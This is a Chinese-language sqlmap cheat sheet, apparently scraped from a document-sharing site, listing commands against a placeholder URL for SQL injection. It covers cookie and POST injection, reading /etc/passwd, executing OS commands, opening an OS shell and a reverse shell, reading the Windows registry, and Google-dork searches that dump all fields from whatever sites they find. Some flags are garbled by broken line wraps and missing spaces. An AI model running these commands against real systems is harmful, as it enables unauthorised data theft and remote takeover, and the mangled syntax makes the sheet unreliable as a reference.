文档介绍：Sqlmap 最新测试文档 Email:******@ 1
测试许多款sql注入工具 最终还是发现sqlmap 最为强悍-exclude-sysdbs -v 0 # 列
出当前库所有表
sqlmap -u "http://url/news?id=1" --union-cols #union 查询表记录
sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE" #cookie注入
更多技术信息请访问: 最新测试文档 Email:******@ 3
sqlmap -u "http://url/news?id=1" -b #获取banner信息
sqlmap -u "http://url/news?id=1" --data "id=3" #post注入
sqlmap -u "http://url/news?id=1" -v 1 -f #指纹判别数据库类型
sqlmap -u "http://url/news?id=1" --proxy":8118" #代理注
入
sqlmap -u "http://url/news?id=1"--string"STRING_ON_TRUE_PAGE" # 指
定关键词
sqlmap -u "http://url/news?id=1" --sql-shell #执行指定sql命令
sqlmap -u "http://url/news?id=1" --file /etc/passwd
sqlmap -u "http://url/news?id=1" --os-cmd=whoami #执行系统命令
sqlmap -u "http://url/news?id=1" --os-shell #系统交互shell
sqlmap -u "http://url/news?id=1" --os-pwn #反弹shell
sqlmap -u "http://url/news?id=1" --reg-read #读取win系统注册表
sqlmap -u "http://url/news?id=1" --dbs-o "" #保存进度
sqlmap -u "http://url/news?id=1" --dbs -o "" --resume #恢复
已保存进度
***********高级用法*************
-p name ?n_id=1&name=2&data=2020
我们想指定name参数进行注入
sqlmap -g "google语法" --dump-all --batch #google搜索注入点自动 跑出
所有字段